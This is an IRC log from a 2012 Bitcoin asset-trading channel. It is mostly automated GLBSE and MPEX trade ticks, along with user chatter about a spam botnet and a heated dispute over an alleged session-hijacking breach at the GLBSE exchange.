04:10:53 [GLBSE] [ARS] 80 @ 0.01471 = 1.1768 BTC [-] Sep 03 04:11:27 [GLBSE] [ARS] 250 @ 0.0147 = 3.675 BTC [-] Sep 03 04:12:15 What? I love misinterpreting things. Sep 03 04:13:31 :p Sep 03 04:13:36 [GLBSE] [OBSI.HRPT] 1 @ 0.1033 BTC [-] Sep 03 04:14:48 [GLBSE] [ARS] 50 @ 0.0147 = 0.735 BTC [-] Sep 03 04:15:06 [GLBSE] [BDT] 42 @ 1.01 = 42.42 BTC [-] Sep 03 04:21:48 [GLBSE] [BTC-MINING] 1 @ 0.99998 BTC [-] Sep 03 04:23:48 [MPEX] [O.BTCUSD.C100T] 666 @ 0.19099859 = 127.2051 BTC [+] Sep 03 04:23:57 [MPEX] [O.BTCUSD.C110T] 999 @ 0.14614218 = 145.996 BTC [+] Sep 03 04:23:58 [GLBSE] [FPGAMINING] 1 @ 0.7779 BTC [+] Sep 03 04:24:31 [GLBSE] [MMM] 26 @ 0.9 = 23.4 BTC [+] Sep 03 04:24:33 [GLBSE] [YARR] 1 @ 0.99999 BTC [-] Sep 03 04:25:38 [GLBSE] [ASICMINER] 10 @ 0.118189 = 1.1819 BTC [-] Sep 03 04:25:46 ;;BC,24hprc Sep 03 04:25:47 10.06 Sep 03 04:29:02 kakobrekla: that net chart link is still broken Sep 03 04:29:13 [GLBSE] [OBSI.HRPT] 10 @ 0.1033 = 1.033 BTC [-] Sep 03 04:31:28 ! Help Sep 03 04:31:47 !help Sep 03 04:31:47 List of commands: Sep 03 04:31:48 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 03 04:31:49 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 03 04:44:16 !pl DMC 1@0.00000001 2012-08-01 Sep 03 04:44:17 Requesting data from GLBSE (might take a while). Sep 03 04:44:20 DMC [1@0.00000001BTC] (since: 2012-08-01) paid: 0.01312156 BTC. Last price: 0.08 BTC. Capital gain: 0.07999999 BTC. Total: 0.09312155 BTC. (931215500%) Sep 03 04:44:28 winning Sep 03 04:44:55 lol Sep 03 04:45:36 He should have started the other fund Sep 03 04:45:47 The one in satoshis Sep 03 04:46:01 So nobody could complain Sep 03 04:48:51 lol Sep 03 04:49:03 !pl DMC 1 Sep 03 04:49:04 Requesting data from GLBSE (might take a while). Sep 03 04:49:06 DMC [1@1BTC] paid: 0.02635814 BTC. Last price: 0.08 BTC. Capital gain: -0.92 BTC. Total: -0.89364186 BTC. (-89.4%) Sep 03 04:49:32 whee' Sep 03 04:50:23 assbot should learn to say Capita loss Sep 03 04:50:56 gain - seems good enough neh? Sep 03 04:51:27 Yea, but loss have glamour Sep 03 04:51:29 lol Sep 03 04:55:27 [GLBSE] [GIGAMINING] 9 @ 0.879 = 7.911 BTC [+] Sep 03 05:03:57 [GLBSE] [MAR] 1 @ 0.0001 BTC Sep 03 05:04:35 [MPEX] [S.MPOE] 3742 @ 0.00039223 = 1.4677 BTC [-] Sep 03 05:04:37 [MPEX] [S.MPOE] 48996 @ 0.00039119 = 19.1667 BTC [-] Sep 03 05:04:37 [MPEX] [S.MPOE] 1132 @ 0.00038969 = 0.4411 BTC [-] Sep 03 05:04:38 [MPEX] [S.MPOE] 1827 @ 0.00038811 = 0.7091 BTC [-] Sep 03 05:11:00 [GLBSE] [MAR] 5000 @ 0.00011 = 0.55 BTC [+] Sep 03 05:13:54 [GLBSE] [MAR] 45000 @ 0.00011 = 4.95 BTC [+] Sep 03 05:36:29 [MPEX] [S.MPOE] 22280 @ 0.00038811 = 8.6471 BTC [-] Sep 03 05:47:17 [GLBSE] [FPGAMINING] 1 @ 0.7779 BTC [+] Sep 03 05:48:04 [GLBSE] [BTC-MINING] 24 @ 0.99998 = 23.9995 BTC [-] Sep 03 05:58:01 [GLBSE] [BFLS.RIG] 1 @ 0.948598 BTC [+] Sep 03 05:58:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1032 BTC [-] Sep 03 06:02:40 [MPEX] [S.MPOE] 30075 @ 0.00038902 = 11.6998 BTC [+] Sep 03 06:08:30 [GLBSE] [PUREMINING] 11 @ 0.0934 = 1.0274 BTC [-] Sep 03 06:12:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.12 BTC [-] Sep 03 06:12:28 [GLBSE] [TYGRR.BOND-P] 34 @ 0.115 = 3.91 BTC [-] Sep 03 06:12:29 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11111111 BTC [-] Sep 03 06:12:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11 BTC [-] Sep 03 06:12:31 [GLBSE] [TYGRR.BOND-P] 35 @ 0.102 = 3.57 BTC [-] Sep 03 06:12:32 [GLBSE] [TYGRR.BOND-P] 20 @ 0.1012 = 2.024 BTC [-] Sep 03 06:12:33 [GLBSE] [TYGRR.BOND-P] 1 @ 0.1010101 BTC [-] Sep 03 06:12:34 [GLBSE] [TYGRR.BOND-P] 150 @ 0.101 = 15.15 BTC [-] Sep 03 06:12:35 [GLBSE] [TYGRR.BOND-P] 54 @ 0.1000001 = 5.4 BTC [-] Sep 03 06:12:37 [GLBSE] [TYGRR.BOND-P] 1 @ 0.1 BTC [-] Sep 03 06:12:38 [GLBSE] [TYGRR.BOND-P] 240 @ 0.1 = 24 BTC [-] Sep 03 06:12:39 [GLBSE] [TYGRR.BOND-P] 760 @ 0.1 = 76 BTC [-] Sep 03 06:12:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09090909 BTC [-] Sep 03 06:12:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09 BTC [-] Sep 03 06:12:41 [GLBSE] [TYGRR.BOND-P] 500 @ 0.09 = 45 BTC [-] Sep 03 06:13:24 Alright, now it's getting closer to it's right price Sep 03 06:14:08 which is ? Sep 03 06:16:22 [GLBSE] [ASICMINER] 10 @ 0.118189 = 1.1819 BTC [-] Sep 03 06:18:22 0? Sep 03 06:18:25 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08343191 BTC [-] Sep 03 06:18:27 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08080808 BTC [-] Sep 03 06:18:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.08 BTC [-] Sep 03 06:18:29 [GLBSE] [TYGRR.BOND-P] 2 @ 0.077 = 0.154 BTC [-] Sep 03 06:18:34 lol Sep 03 06:18:38 maybe so Sep 03 06:19:50 I bet they will reach 0... eventually Sep 03 06:20:17 how can it reach 0 Sep 03 06:20:22 this won't happen Sep 03 06:20:30 .00000001 maybe Sep 03 06:20:36 Wasn't it a possibility to enter 0 bids? Sep 03 06:20:46 or was that fixed? Sep 03 06:22:07 moreover who'd sell for 0 bids. Sep 03 06:22:19 it's not like past a 99% loss the receipts are relevant anymore anyway Sep 03 06:22:28 [GLBSE] [NYAN.C] 2 @ 0.8 = 1.6 BTC [-] Sep 03 06:22:50 Well I know I would =/ Sep 03 06:23:12 Once it's worth nothing, it just become annoying text using space in your portfolio Sep 03 06:23:29 I would too on that point Sep 03 06:23:55 a reminder of a bad decision Sep 03 06:28:13 those can be good things. Sep 03 06:32:08 BTC-Mining send worthless shit to the account "server" Sep 03 06:33:30 ah, there is such an account? Sep 03 07:00:30 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Sep 03 07:02:45 [MPEX] [S.MPOE] 24091 @ 0.00038811 = 9.35 BTC [-] Sep 03 07:09:02 [GLBSE] [FPGAMINING] 5 @ 0.75591 = 3.7796 BTC [-] Sep 03 07:09:04 [GLBSE] [FPGAMINING] 39 @ 0.75581 = 29.4766 BTC [-] Sep 03 07:09:05 [GLBSE] [FPGAMINING] 1 @ 0.7557 BTC [-] Sep 03 07:23:48 [GLBSE] [PUREMINING] 1 @ 0.0934 BTC [-] Sep 03 07:32:33 http://www.youtube.com/watch?v=_0zWIJc4U_8 Sep 03 07:32:38 this should be the btc rally song. Sep 03 07:32:55 gloria in excelsis. Sep 03 07:37:49 [GLBSE] [GMVT-BOT] 2 @ 0.135 = 0.27 BTC [-] Sep 03 07:38:58 [GLBSE] [ASICMINER] 55 @ 0.118289 = 6.5059 BTC [+] Sep 03 07:40:37 [GLBSE] [ASICMINER] 30 @ 0.11839 = 3.5517 BTC [+] Sep 03 07:40:39 [GLBSE] [ASICMINER] 120 @ 0.118498 = 14.2198 BTC [+] Sep 03 07:41:12 [GLBSE] [ASICMINER] 3 @ 0.118498 = 0.3555 BTC [+] Sep 03 07:43:13 [GLBSE] [MOVETO.FUND] 3 @ 1.1876 = 3.5628 BTC [+] Sep 03 07:44:18 [GLBSE] [MOVETO.FUND] 11 @ 1.1877 = 13.0647 BTC [+] Sep 03 07:55:43 [GLBSE] [MERGEDMINING] 10 @ 0.08587 = 0.8587 BTC [-] Sep 03 07:56:14 [GLBSE] [BIB.PIRATE] 20 @ 0.141 = 2.82 BTC [-] Sep 03 07:56:16 [GLBSE] [BIB.PIRATE] 125 @ 0.135 = 16.875 BTC [-] Sep 03 08:04:05 [MPEX] [O.BTCUSD.P110T] 400 @ 0.25664317 = 102.6573 BTC [-] Sep 03 08:04:18 [GLBSE] [NYAN.A] 22 @ 1 = 22 BTC [+] Sep 03 08:04:19 [GLBSE] [NYAN.A] 28 @ 1.01 = 28.28 BTC [+] Sep 03 08:08:05 [MPEX] [S.MPOE] 10016 @ 0.00038873 = 3.8935 BTC [+] **** BEGIN LOGGING AT Mon Sep 3 16:25:22 2012 Sep 03 16:26:48 ;;ticker Sep 03 16:26:49 Best bid: 10.21709, Best ask: 10.3087, Bid-ask spread: 0.09161, Last trade: 10.22, 24 hour volume: 25780, 24 hour low: 9.85001, 24 hour high: 10.35579 Sep 03 16:33:52 [GLBSE] [FDBF] 32 @ 0.14999999 = 4.8 BTC [+] Sep 03 16:34:10 [GLBSE] [NYAN.A] 1 @ 1 BTC [-] Sep 03 16:34:48 [GLBSE] [NYAN] 4 @ 1 = 4 BTC [-] Sep 03 16:35:48 [GLBSE] [BTC-MINING] 3 @ 0.99998 = 2.9999 BTC [-] Sep 03 16:36:26 [GLBSE] [YABMC] 1 @ 0.1099 BTC [-] Sep 03 16:36:27 [GLBSE] [YABMC] 6 @ 0.11 = 0.66 BTC [+] Sep 03 16:36:29 [GLBSE] [YABMC] 93 @ 0.11 = 10.23 BTC [+] Sep 03 16:36:42 [GLBSE] [YABMC] 7 @ 0.11 = 0.77 BTC [+] Sep 03 16:36:44 [GLBSE] [YABMC] 80 @ 0.1179 = 9.432 BTC [+] Sep 03 16:37:50 [GLBSE] [YABMC] 100 @ 0.118 = 11.8 BTC [+] Sep 03 16:38:05 [GLBSE] [YABMC] 9 @ 0.1181 = 1.0629 BTC [+] Sep 03 16:38:07 [GLBSE] [YABMC] 10 @ 0.1181 = 1.181 BTC [+] Sep 03 16:39:05 [MPEX] [S.MPOE] 200 @ 0.0003873 = 0.0775 BTC [+] Sep 03 16:39:06 [MPEX] [S.MPOE] 289 @ 0.00038645 = 0.1117 BTC [-] Sep 03 16:40:43 [GLBSE] [ASICMINER] 29 @ 0.1398 = 4.0542 BTC [+] Sep 03 16:41:25 [GLBSE] [ASICMINER] 31 @ 0.1399 = 4.3369 BTC [+] Sep 03 16:42:28 [GLBSE] [YABMC] 95 @ 0.1175 = 11.1625 BTC [-] Sep 03 16:42:47 [GLBSE] [YABMC] 5 @ 0.1175 = 0.5875 BTC [-] Sep 03 16:42:49 [GLBSE] [YABMC] 95 @ 0.1184 = 11.248 BTC [+] Sep 03 16:43:07 [GLBSE] [TYGRR.BOND-P] 20 @ 0.118 = 2.36 BTC [-] Sep 03 16:49:55 [GLBSE] [GIGAMINING] 1 @ 0.9001 BTC [-] Sep 03 16:50:24 [GLBSE] [ZETA-MINING] 1 @ 0.179 BTC [+] Sep 03 16:50:35 [MPEX] [S.MPOE] 200 @ 0.00038912 = 0.0778 BTC [+] Sep 03 16:50:37 [MPEX] [S.MPOE] 1300 @ 0.00038995 = 0.5069 BTC [+] Sep 03 16:50:38 [MPEX] [S.MPOE] 8844 @ 0.00039205 = 3.4673 BTC [+] Sep 03 16:50:39 [MPEX] [S.MPOE] 8035 @ 0.0003926 = 3.1545 BTC [+] Sep 03 16:51:21 [GLBSE] [ZETA-MINING] 200 @ 0.18 = 36 BTC [+] Sep 03 16:51:29 [MPEX] [O.BTCUSD.P120T] 290 @ 0.33460132 = 97.0344 BTC [+] Sep 03 16:52:00 [GLBSE] [ZETA-MINING] 2 @ 0.183 = 0.366 BTC [+] Sep 03 16:53:22 [GLBSE] [ZETA-MINING] 56 @ 0.18379999 = 10.2928 BTC [+] Sep 03 16:54:21 [GLBSE] [ZETA-MINING] 2 @ 0.1838 = 0.3676 BTC [+] Sep 03 16:54:59 [GLBSE] [ZETA-MINING] 6 @ 0.18398 = 1.1039 BTC [+] Sep 03 16:55:34 http://polimedia.us/dtng/c/src/134668051447.jpg dun dun dun Sep 03 16:55:46 [GLBSE] [ZETA-MINING] 44 @ 0.184 = 8.096 BTC [+] Sep 03 16:56:37 [GLBSE] [ZETA-MINING] 10 @ 0.1839 = 1.839 BTC [-] Sep 03 16:58:55 [GLBSE] [GIGAMINING] 5 @ 0.9001 = 4.5005 BTC [-] Sep 03 16:58:57 [GLBSE] [GIGAMINING] 5 @ 0.9 = 4.5 BTC [-] Sep 03 17:03:33 [GLBSE] [ASICMINER] 19 @ 0.1399 = 2.6581 BTC [+] Sep 03 17:04:31 [GLBSE] [ASICMINER] 63 @ 0.13999 = 8.8194 BTC [+] Sep 03 17:05:51 [GLBSE] [FPGAMINING] 3 @ 0.7339 = 2.2017 BTC [-] Sep 03 17:11:34 [GLBSE] [ASICMINER] 1 @ 0.13999 BTC [+] Sep 03 17:18:08 [GLBSE] [TEEK.B] 2 @ 0.745 = 1.49 BTC [-] Sep 03 17:24:31 [GLBSE] [FPGAMINING] 4 @ 0.7339 = 2.9356 BTC [-] Sep 03 17:28:41 [GLBSE] [HYDRO.BONDS] 3 @ 1.57 = 4.71 BTC [-] Sep 03 17:28:55 [GLBSE] [HYDRO.BONDS] 1 @ 1.57 BTC [-] Sep 03 17:29:03 [GLBSE] [BFLS.RIG] 1 @ 0.948598 BTC [+] Sep 03 17:35:19 [GLBSE] [FPGAMINING] 2 @ 0.734 = 1.468 BTC [+] Sep 03 17:38:59 [GLBSE] [TYGRR.BOND-P] 30 @ 0.0801 = 2.403 BTC [-] Sep 03 17:39:01 [GLBSE] [TYGRR.BOND-P] 40 @ 0.08 = 3.2 BTC [-] Sep 03 17:39:59 [GLBSE] [TYGRR.BOND-P] 15 @ 0.08 = 1.2 BTC [-] Sep 03 17:40:00 [GLBSE] [TYGRR.BOND-P] 185 @ 0.08 = 14.8 BTC [-] Sep 03 17:40:48 [GLBSE] [TYGRR.BOND-P] 15 @ 0.08 = 1.2 BTC [-] Sep 03 17:40:49 [GLBSE] [TYGRR.BOND-P] 3 @ 0.08 = 0.24 BTC [-] Sep 03 17:40:51 [GLBSE] [TYGRR.BOND-P] 100 @ 0.08 = 8 BTC [-] Sep 03 17:40:52 [GLBSE] [TYGRR.BOND-P] 68 @ 0.077 = 5.236 BTC [-] Sep 03 17:40:53 [GLBSE] [TYGRR.BOND-P] 4 @ 0.075 = 0.3 BTC [-] Sep 03 17:41:37 [MPEX] [S.MPOE] 200 @ 0.00038875 = 0.0778 BTC [-] Sep 03 17:41:38 [MPEX] [S.MPOE] 2400 @ 0.00038786 = 0.9309 BTC [-] Sep 03 17:41:40 [MPEX] [S.MPOE] 20148 @ 0.00038645 = 7.7862 BTC [-] Sep 03 17:41:41 [MPEX] [S.MPOE] 16416 @ 0.0003862 = 6.3399 BTC [-] Sep 03 17:42:44 [GLBSE] [PUREMINING] 20 @ 0.0933 = 1.866 BTC [-] Sep 03 17:43:39 [GLBSE] [PUREMINING] 1 @ 0.0933 BTC [-] Sep 03 17:58:09 [GLBSE] [FPGAMINING] 3 @ 0.734 = 2.202 BTC [+] Sep 03 17:58:12 Hahahahahahahaha Sep 03 17:58:18 The goatse guy is spamming me in PM now Sep 03 17:58:26 demanding I pay his mythical 150 btc Sep 03 17:58:52 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 03 17:58:58 [GLBSE] [FDBF] 10 @ 0.14999999 = 1.5 BTC [+] Sep 03 17:58:59 I suspect the assbot, on grounds of the name Sep 03 17:59:07 Well Sep 03 17:59:12 I know his ip and isp Sep 03 17:59:24 I just don't care enough Sep 03 17:59:38 [GLBSE] [KRAKEN] 20 @ 0.01 = 0.2 BTC [+] Sep 03 17:59:56 I hope he pisses off the wrong person Sep 03 18:00:04 thats about it Sep 03 18:00:04 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC [+] Sep 03 18:00:06 use /umode +gR to stop the bot Sep 03 18:00:52 MoneyIsDebt omg the assbot is innocent Sep 03 18:01:21 as much of an ass as it is ;) i hafta agree .... it soo gribble Sep 03 18:01:33 the butler did it. Sep 03 18:02:18 [GLBSE] [DI.BFLSC.SUCCEED] 1 @ 0.001 BTC Sep 03 18:03:44 [GLBSE] [NYAN.C] 49 @ 0.69 = 33.81 BTC [+] Sep 03 18:05:35 lol, /ignore *!*@49.204.143.* stops the bot Sep 03 18:05:46 Although I guess he will change is IP every now and then Sep 03 18:07:43 the ips are all different Sep 03 18:07:52 usagi: he is using a botnet now ... /umode +gR is pretty much all you can do Sep 03 18:08:04 we are working on "other measures" Sep 03 18:08:09 lol Sep 03 18:08:10 [GLBSE] [THUNDERCM.MIF.SHARES] 6 @ 0.4339 = 2.6034 BTC [+] Sep 03 18:08:24 150 btc ehh Sep 03 18:08:33 I bet there's only one person with that many btc in pirate Sep 03 18:08:47 also - report the hostmask and nick in #report_goatse_spam Sep 03 18:09:16 I dont think anyone invested in pirate Sep 03 18:09:20 not one dime Sep 03 18:09:33 all a government plot ? Sep 03 18:10:14 no Sep 03 18:10:17 how to get hostname? Sep 03 18:10:18 just some troll Sep 03 18:10:27 leotreasure: the bots dont have hostnames set Sep 03 18:10:31 just IPs Sep 03 18:10:45 and dont bother attacking the IPs, they're all random Sep 03 18:10:50 [GLBSE] [FDBF] 3 @ 0.14999999 = 0.45 BTC [+] Sep 03 18:10:54 [GLBSE] [YABMC] 2 @ 0.1183 = 0.2366 BTC [-] Sep 03 18:11:09 ok so how do i report? Sep 03 18:12:17 you dont. Sep 03 18:12:24 the freenode staff have already admitted they dont care Sep 03 18:12:39 [MPEX] [F.GIGA.ETF] 10232 @ 0.00085342 = 8.7322 BTC [+] Sep 03 18:12:46 oh really Sep 03 18:12:49 [GLBSE] [TYGRR.BOND-P] 10 @ 0.1 = 1 BTC [+] Sep 03 18:14:14 can we use blockchain to do some network analysis on where this goat is from? Sep 03 18:14:16 http://blockchain.info/address/1GoatSe6pWoeTXugzofi7QUG3SFskFH2yp Sep 03 18:14:53 I doubt we can do network analysis Sep 03 18:15:22 [MPEX] [F.GIGA.ETF] 4300 @ 0.00085342 = 3.6697 BTC [+] Sep 03 18:15:52 why is that? Sep 03 18:16:35 because of botnet/ Sep 03 18:20:32 [00:28:48] Think about it? Backs MNW to make this huge bet, all the nonponzis get paid,a nd the proponzis either pay up or get scammer tags <<< UhOh the gig is up Mnw/Pirate :P Sep 03 18:20:45 hmm, anyone know the virwox ppl ? Sep 03 18:21:03 virwox is pretty solid Sep 03 18:21:06 MrTiggr what's that ? Sep 03 18:21:10 It's ok I already blocked him Sep 03 18:21:23 [MPEX] [S.DICE] 51507 @ 0.0034 = 175.1238 BTC [+] Sep 03 18:21:36 [11:15:53] why is that? Sep 03 18:21:36 [11:16:36] because of botnet/ Sep 03 18:21:40 its probably unlisted tor nodes Sep 03 18:24:08 ok - what does the /umode +gR command do? Sep 03 18:24:27 http://bitcoin.jobamatic.com/a/jobs/find-jobst Sep 03 18:24:35 this shit is funny : "Counter-Threat Finance Operations Intelligence Analyst with Security Clearance" Sep 03 18:24:58 leotreasure: +g sets no PMs unless you agree (/accept ) Sep 03 18:25:09 leotreasure: +R says no PM unless registered nick Sep 03 18:25:18 together they fight the evil powa of goatse Sep 03 18:25:52 cool thanks! Sep 03 18:26:16 sadly i can't use either. Sep 03 18:26:42 [GLBSE] [GIGAMINING] 3 @ 0.8799 = 2.6397 BTC [-] Sep 03 18:26:48 yah, neither can i mircea_popescu ... i just have to eat goatespam :( Sep 03 18:26:57 im not getting any lol. Sep 03 18:27:14 ur not in #bitcoin-* talking mircea_popescu Sep 03 18:27:23 try it for goathole Sep 03 18:27:27 onoty. Sep 03 18:27:35 lol Sep 03 18:29:23 [GLBSE] [FPGAMINING] 1 @ 0.734 BTC [+] Sep 03 18:30:03 ;;later tell nefario https://bitcointalk.org/index.php?topic=99497.msg1156911#msg1156911 Sep 03 18:30:04 The operation succeeded. Sep 03 18:30:41 ;;seen nefario Sep 03 18:30:41 nefario was last seen in #bitcoin-assets 5 days, 7 hours, 12 minutes, and 44 seconds ago: BTC-Mining: GBLSE HAXOR Sep 03 18:30:50 [GLBSE] [ASICMINER] 2 @ 0.12210001 = 0.2442 BTC [-] Sep 03 18:30:52 [GLBSE] [GIGAMINING] 1 @ 0.8799 BTC [-] Sep 03 18:30:55 jesus don't tell me he got into one of those double border detention things. Sep 03 18:31:20 [GLBSE] [FPGAMINING] 1 @ 0.734 BTC [+] Sep 03 18:31:45 o wow jesus fucken god Diablo-D3. Sep 03 18:31:49 [GLBSE] [ASICMINER] 32 @ 0.1221 = 3.9072 BTC [-] Sep 03 18:31:58 when i published that piece discussing their security it was all "o, it's fud" Sep 03 18:32:14 [GLBSE] [FPGAMINING] 4 @ 0.734 = 2.936 BTC [+] Sep 03 18:33:23 [MPEX] [F.GIGA.ETF] 558 @ 0.00085342 = 0.4762 BTC [+] Sep 03 18:34:23 [GLBSE] [BDT] 90 @ 1.01 = 90.9 BTC [-] Sep 03 18:34:40 What are you talking about Sep 03 18:34:43 [MPEX] [O.BTCUSD.P080T] 10 @ 0.04473746 = 0.4474 BTC [+] Sep 03 18:34:50 [GLBSE] [BDT] 10 @ 1.01 = 10.1 BTC [-] Sep 03 18:35:11 [GLBSE] [FDBF] 6 @ 0.14999999 = 0.9 BTC [+] Sep 03 18:35:24 [GLBSE] [FDBF] 1 @ 0.14999999 BTC [+] Sep 03 18:35:52 usagi the global scam exchange. Sep 03 18:36:42 Seriously, no one respects you because you keep saying that Sep 03 18:37:14 You're just looking for a chance to badmouth glbse and nefario Sep 03 18:37:25 The problem is actually with mpex Sep 03 18:37:34 You don't understand marketing or branding at all Sep 03 18:37:40 usagi : someone JUST HAD THEIR SHARES STOLEN Sep 03 18:37:44 through session stealing Sep 03 18:37:47 [GLBSE] [UDN] 1 @ 0.099888 BTC [-] Sep 03 18:37:54 Who, when, what, where? Sep 03 18:37:56 something which my paper clearly points out, back when nefario lied and called it "fud". Sep 03 18:37:58 yaya Sep 03 18:38:04 read up first, talk second. Sep 03 18:38:09 Well first Sep 03 18:38:11 that's the customary order. Sep 03 18:38:17 You have a history of guessing and overstating. Sep 03 18:38:18 [MPEX] [O.BTCUSD.P050N] 10 @ 0.0501286 = 0.5013 BTC [+] Sep 03 18:38:26 no. i have a history of being right. Sep 03 18:38:27 Second----- this is now the third time I am going to ask you Sep 03 18:38:30 What are you talking about Sep 03 18:38:35 you and your scam exchange have a history of... scamming users. Sep 03 18:38:39 What do you think I am, a mind reader? Sep 03 18:38:49 just try reading the channel. Sep 03 18:38:52 And it's not a scam exchange because someone got hacked mircea. Sep 03 18:38:56 riiiight. Sep 03 18:39:00 it's just free market rite ? Sep 03 18:39:27 https://bitcointalk.org/index.php?topic=99497.msg1156815#msg1156815 Sep 03 18:39:30 there is your pointer. Sep 03 18:39:46 Thanks Sep 03 18:40:05 [GLBSE] [GIGAMINING] 5 @ 0.8613 = 4.3065 BTC [-] Sep 03 18:40:06 [GLBSE] [GIGAMINING] 6 @ 0.8612 = 5.1672 BTC [-] Sep 03 18:40:07 [GLBSE] [GIGAMINING] 1 @ 0.86 BTC [-] Sep 03 18:40:08 [GLBSE] [GIGAMINING] 10 @ 0.85 = 8.5 BTC [-] Sep 03 18:40:09 [GLBSE] [GIGAMINING] 2 @ 0.84 = 1.68 BTC [-] Sep 03 18:40:10 Nefario is not resposible to reverse or pay back anyone that gets hacked and have their funds lossed. Sep 03 18:40:10 [GLBSE] [GIGAMINING] 1 @ 0.83 BTC [-] Sep 03 18:40:11 [GLBSE] [GIGAMINING] 9 @ 0.83 = 7.47 BTC [-] Sep 03 18:40:12 [GLBSE] [GIGAMINING] 5 @ 0.8221 = 4.1105 BTC [-] Sep 03 18:40:13 [GLBSE] [GIGAMINING] 6 @ 0.822 = 4.932 BTC [-] Sep 03 18:40:14 [GLBSE] [GIGAMINING] 14 @ 0.821001 = 11.494 BTC [-] Sep 03 18:40:15 [GLBSE] [GIGAMINING] 9 @ 0.821 = 7.389 BTC [-] Sep 03 18:40:16 [GLBSE] [GIGAMINING] 5 @ 0.8201 = 4.1005 BTC [-] Sep 03 18:40:17 [GLBSE] [GIGAMINING] 100 @ 0.82 = 82 BTC [-] Sep 03 18:40:18 [GLBSE] [GIGAMINING] 5 @ 0.82 = 4.1 BTC [-] Sep 03 18:40:19 [GLBSE] [GIGAMINING] 2 @ 0.82 = 1.64 BTC [-] Sep 03 18:40:35 It's not my exchange either Sep 03 18:40:40 by the way. Sep 03 18:40:41 btw I am DeaDTerra xD let me check if the nameserver wants to play now Sep 03 18:40:55 usagi what exactly is your relation to it ? Sep 03 18:41:04 Same as yours. Sep 03 18:41:05 and if you say none, i will have this on record, just fiy. Sep 03 18:41:12 mkay. Sep 03 18:41:14 ;;ident usagi Sep 03 18:41:15 Nick 'usagi', with hostmask 'usagi!~usagi@111-255-135-136.dynamic.hinet.net', is not identified. Sep 03 18:41:41 A huge problem with you, is that you have trouble saying what you mean Sep 03 18:41:47 and when you do speak out it's incredibly biased. Sep 03 18:41:58 You let your emotions cloud your judgement in business Sep 03 18:42:03 ... Sep 03 18:42:04 it's a problem, mircea. Sep 03 18:42:24 nice try. we're not discussing my emotions, this isn't a dating site. Sep 03 18:42:32 the subject of the day is yet another glbse breach (yagb) Sep 03 18:42:36 On this one I kind of agree ... and I use both exchanges and I think both have their positive and negative sides Sep 03 18:42:43 oh shit, really? session stolen on glbse? Sep 03 18:42:46 Do you know what happened, mircea? Sep 03 18:42:48 seems that way. Sep 03 18:42:52 Or do you know only what you read in that thread? Sep 03 18:43:05 I'm asking you straight if you have information besides what has been posted Sep 03 18:43:07 usagi i thought you didn't have any relation to it, so you don't know anything else. Sep 03 18:43:08 I would like to see Nefarios investigation before we actually jump to conclusions Sep 03 18:43:17 Just answer the question. Sep 03 18:43:40 DeaDTerra1: logically, nef should lie about what happened Sep 03 18:43:47 (game theory i mean() Sep 03 18:43:53 [GLBSE] [ASICMINER] 32 @ 0.1221 = 3.9072 BTC [-] Sep 03 18:44:07 fact is i don't really trust his track record. other people's mileage may vary. Sep 03 18:44:09 He would if he's a lier, if he's a legit and trustworthy man as I believe he is he will admit the fault and fix it before it's exploited again. Sep 03 18:44:21 DeaDTerra1 except this problem was pointed out to him before. Sep 03 18:44:22 I don't care if you trust him Sep 03 18:44:25 not just by one person. Sep 03 18:44:33 I want to know if you know anything about this other than what has been posted on bitcointalk.org. Sep 03 18:44:39 [GLBSE] [FDBF] 20 @ 0.14999999 = 3 BTC [+] Sep 03 18:44:45 usagi good for you. Sep 03 18:45:39 I will talk to him later on tonight/tomorrow then :) Sep 03 18:45:51 Yeah well this is the problem with you mircea. You like to accuse people of stuff but when people start asking questions it becomes obvious you are talking shit. Sep 03 18:46:16 usagi no, i simply don't bow to ill advised attemtps to shift the focus. i was a politician before you were a teenager, so. Sep 03 18:46:20 You know nothing about what is going on yet you love to tell people it's a scam, nefario is scamming people, it's a scam exchange Sep 03 18:46:29 the subject is global scam exchange poor implementation of security. Sep 03 18:46:35 All you are doing is alienating people who would have listed with you. Sep 03 18:46:39 Nefario Sep 03 18:46:45 ty for da help usagi. Sep 03 18:46:51 Can you please tgell mircea to shut the fuck up about glbse scamming people Sep 03 18:47:07 He's saying glbse is a scam exchange because someone got session hijacked or something stupid Sep 03 18:47:09 o if it's not the mr lost a session again. Sep 03 18:47:12 hhahahahh using the line I was a politician is in my eyes a bad move. All politicians are scums and slimey. Sep 03 18:47:16 how's the "fud" going nefario ? Sep 03 18:47:29 DeaDTerra1 ya well, shit job, someone has to do it. Sep 03 18:48:42 mircea_popescu is just stiring shit Sep 03 18:48:47 [GLBSE] [ASICMINER] 2 @ 0.12200001 = 0.244 BTC [-] Sep 03 18:48:49 no one had their session hijacked Sep 03 18:48:49 [GLBSE] [ASICMINER] 18 @ 0.122 = 2.196 BTC [-] Sep 03 18:48:49 nefario you lost a session. Sep 03 18:48:57 I lost a session? Sep 03 18:48:59 you were warned (by me, and by others) that you are leaking sessions. Sep 03 18:49:02 what more do you want ? Sep 03 18:49:05 go fix that site already. Sep 03 18:49:14 you don't know what you're talking about Sep 03 18:49:17 sigh, Sep 03 18:49:23 sometimes i don't even know why i bother. Sep 03 18:49:34 you can't "leak" a session Sep 03 18:50:04 nefario https://bitcointalk.org/index.php?topic=99497.msg1156815#msg1156815 start there. Sep 03 18:50:29 I don't know if you read later on Sep 03 18:50:35 I've already addresses this Sep 03 18:50:38 so Sep 03 18:50:40 fuck off Sep 03 18:50:57 actually, a better ideea : Sep 03 18:51:10 take that thing offline, fix it, bring it back online after you get it professionally audited. Sep 03 18:51:11 twice. Sep 03 18:51:21 why don't you Sep 03 18:51:26 "GLBSE resets the session ID after login which prevents session fixation." Sep 03 18:51:35 boom Sep 03 18:51:38 also Sep 03 18:51:48 apart from google and twitter Sep 03 18:51:53 we don't link anywhere else Sep 03 18:51:57 or Sep 03 18:52:05 load any other external javascript Sep 03 